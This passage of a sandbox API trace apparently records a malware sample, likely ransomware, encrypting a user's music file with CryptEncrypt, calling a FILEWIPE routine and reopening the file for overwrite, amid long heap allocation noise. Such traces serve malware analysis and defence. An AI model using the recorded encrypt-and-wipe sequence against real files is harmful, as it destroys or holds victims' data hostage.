lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0184.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.278] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0184.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0184.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0184.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.314] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.314] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.315] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.315] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.315] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.315] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.315] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.315] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.315] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.315] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.315] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.316] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x64c5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x64d0) returned 1 [0184.316] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.316] CharLowerBuffW (in: lpsz="byte[25809]", cchLength=0xb | out: lpsz="byte[25809]") returned 0xb [0184.318] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.320] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbfce88*, pdwDataLen=0x87e820*=0x64c5, dwBufLen=0x64d0 | out: pbData=0xbfce88*, pdwDataLen=0x87e820*=0x64d0) returned 1 [0184.321] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.321] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.322] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.333] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0184.333] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.333] CryptDestroyKey (hKey=0x90af18) returned 1 [0184.334] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.334] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.334] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.334] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.334] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0184.334] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.334] FreeLibrary (hLibModule=0x74f20000) returned 1 [0184.358] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0184.359] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x822c4ab0, ftCreationTime.dwHighDateTime=0x1d5dcc0, ftLastAccessTime.dwLowDateTime=0x45537f10, ftLastAccessTime.dwHighDateTime=0x1d5e179, ftLastWriteTime.dwLowDateTime=0x45537f10, ftLastWriteTime.dwHighDateTime=0x1d5e179, nFileSizeHigh=0x0, nFileSizeLow=0x64c5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="K4cO 93Mbgwb3udHm.m4a", cAlternateFileName="K4CO93~1.M4A")) returned 0x90ae18 [0184.359] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0184.359] CharLowerBuffW (in: lpsz="byte[25797]", cchLength=0xb | out: lpsz="byte[25797]") returned 0xb [0184.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0184.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0184.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0184.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0184.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0184.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0184.361] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0184.361] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0184.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0184.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.362] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0184.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0184.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0184.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0184.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2898 [0184.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2898, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0184.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0184.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0184.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.362] FreeLibrary (hLibModule=0x75c90000) returned 1 [0184.362] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0184.363] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0184.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0184.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0184.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0184.363] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0184.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0184.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9b9fd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0184.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\k4co 93mbgwb3udhm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0184.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0184.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0184.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0184.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0184.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd04d8 | out: hHeap=0x8a0000) returned 1 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0184.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0184.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0184.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0184.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0184.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0184.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0184.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0184.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0184.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0184.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0184.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0184.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0184.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0184.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0184.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0184.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0184.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0184.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0184.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0184.366] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: 